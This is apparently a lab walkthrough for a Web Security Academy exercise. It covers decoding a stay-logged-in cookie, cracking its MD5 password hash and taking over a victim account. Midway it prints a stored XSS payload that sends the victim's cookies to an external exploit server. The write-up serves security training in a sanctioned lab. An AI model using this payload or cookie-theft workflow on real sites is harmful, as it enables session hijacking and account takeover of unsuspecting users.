Offline password cracking

To access the lab visit the following link:

Lab: Offline password cracking | Web Security Academy

This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the "My account" page.

• Your credentials: wiener:peter
• Victim’s username: carlos

Click on the given button to access the lab:

On the Lab’s homepage we can see “My account” option. Let’s click on that to attempt login.

Lab homepage

Let’s login using correct username and password to capture the login request using burp. In this way we can see the login functionality of the application and how the authentication system is working.

login using provided credentials

We are successfully logged in to the application.

Response from server

Let’s see the POST request in burp HTTP history. The login POST request contains username, password and stay-logged-in field which indicates a preference to stay logged in, often implemented with a checkbox on the login form. The value “on” shows that the user has selected the option to remain logged in across sessions.

Login POST request

On viewing the response we can see the standard session cookie and stay-logged-in cookie.

Cookies in response of login request

Next, let’s copy the stay-logged-in cookie and go to the Decoder in Burp Suite. The Decoder tool allows us to decode the cookie's value, which might be encoded in a format such as Base64. By decoding it, we can understand the actual data stored in the cookie, which can be useful for analyzing its contents and understanding how the application handles persistent login sessions.

Paste stay-logged-in cookie in decoder and click on Decode as to select the base64options from menu. The cookie will be decoded and shown below.

Decoding cookie in decoder

We can see the decoded cookie. Upon viewing it we can see it includes the username and a hash.

Decoded cookie in decoder

Let’s try to crack that hash. Go to CrackStation.

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.

Paste the copied hash into CrackStation and click on “Crack Hash.” The hash is successfully cracked, revealing that it is an MD5 hash that corresponds to Wiener’s password.

Hash cracked using crackstation

Through our analysis, we have learned that the stay-logged-in cookie is actually a Base64 encoded string that combines the username and the MD5 hash of the user's password in the following format:

username:md5hashpassword

For example, if the username is “wiener” and the MD5 hash of the password is “51dc30ddc473d43a6011e9ebba6ca770”, the stay-logged-in cookie will contain the Base64 encoded version of "wiener:51dc30ddc473d43a6011e9ebba6ca770"

From lab’s description we know that the lab also contains an XSS vulnerability in the comment functionality. Let’s exploit that to get stay-logged-in cookie of victim (Carlos).

Let’s log out from the wiener’s account.

logging out from wiener’s account

On lab’s homepage we can see view post button at the end of each blog post. Let’s click on that to see the blog.

view post button for blog post

On scrolling down the blog, we notice an option to add a comment. We will insert an XSS payload in the comment section to capture the victim’s stay-logged-in cookie.

Comment section of blog post

Before that, We can see a Go to exploit server button on our lab homepage. So let’s go to the exploit server and copy our link where we will host the XSS payload.

exploit server button

On exploit server we can see the link of exploit server. Let’s copy that link and create a XSS payload.

Exploit server link

Let’s get back to comment section in blog post and add payload in the comment as shown in the image below.

• When this payload is executed, it will redirect the user’s browser to exploit-server.
• The user’s cookies will be appended to this URL as a query string parameter. In this way we can steal cookies of our victim.

<script>document.location='https://exploit-0aad009f0411ee79837e720401ff000b.exploit-server.net/exploit'+document.cookie</script>

Adding payload to the comment section

As soon as we post a comment it says Than you for your comment!. Now, Let’s get back to our exploit server

Comment submitted successfully

On exploit server we can see Access log button on the bottom of page. Let’s click on that to see the logs captured.

Access log button

Upon viewing the logs on exploit server we found that someone (probably victim) clicked on the blog post and we have his IP address and stay-logged-in cookie.

Stay logged in cookie found

Let’s copy this cookie and decode it in decoder. Upon decoding we can see the cookie is of (carlos) victim.

Cookie decoded in decoder

Let’s copy the MD5 Hash from cookie and crack it using CrackStation. We found the password of victim by cracking the hash.

Hash cracked using crack station

Now, that we have password of victim let’s go to the login page and enter the credentials of victim to login.

Logging in with victim’s credentials

And we are successfully logged in. We can see the Delete account button on home page of Carlos. Let’s click on that to delete the account.

Delete account button on home page

And it asks for user’s password to proceed further.

Authentication required to delete the account

The user account is deleted and the lab is also marked as solved.

Congratulations! The walkthrough of Tenth authentication lab finishes here.

You can see walkthrough of eleventh lab by clicking the following link:

Password reset poisoning via middleware